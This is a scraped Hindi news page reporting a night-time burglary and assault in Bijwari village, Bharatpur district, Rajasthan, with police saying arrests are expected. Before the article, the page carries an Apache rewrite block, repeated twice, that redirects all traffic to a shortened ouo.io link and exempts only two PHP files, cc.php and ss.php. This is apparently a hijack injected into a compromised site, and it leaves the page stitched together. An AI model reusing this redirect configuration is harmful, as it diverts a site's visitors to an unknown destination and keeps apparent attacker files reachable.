
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 644
Previousभरतपुर। राजस्थान में भरतपुर जिले के भुसावर थाना क्षेत्र के बिजवारी गांव में कल रात को तीन-चार अज्ञात बदमाश लूट के इरादे एक घर में घुस गए और घर में सो एक युवक पर नींद में जानलेवा हमला कर दिया। इसके बाद घर में रखी अलमारी के ताले तोड़कर चालीस हजार रुपए की नगदी सहित सोने-चांदी के जेवरात व अन्य कीमती सामान लेकर फरार हो गए। घटना के समय युवक घर पर अकेला था। सूचना के बाद मौके पर पहुंची पुलिस ने मौका मुआयना किया। बदमाशों के हमले में घायल हुए सचिन के भाई अजय ने कहा कि बीती रात अजय घर पर अकेला था और अन्य परिजन किसी काम से गांव के बाहर गए थे। रात एक बजे के करीब तीन-चार बदमाश घर में घुस गए और सचिन पर जानलेवा हमला कर दिया। इस बाद घर में रखे सामान को यहां-फेंक दिया। अलमारी का ताला तोड़कर उसमें से नगदी व जेवरात लेकर फरार हो गए। पुलिस ने बताया कि घटना की जानकारी मिलने के बाद ही पूरे इलाके में नाकेबंदी करा दी गई है। बदमाश तो अभी तक पकड़ में नहीं आए लेकिन, घर से चुराई गई एक अटैची व कुछ कागताज भूसावर के जीएसएस के पास पड़े मिले हैं। जल्द ही बदमाशों को गिरफ्तार कर लिया जाएगा।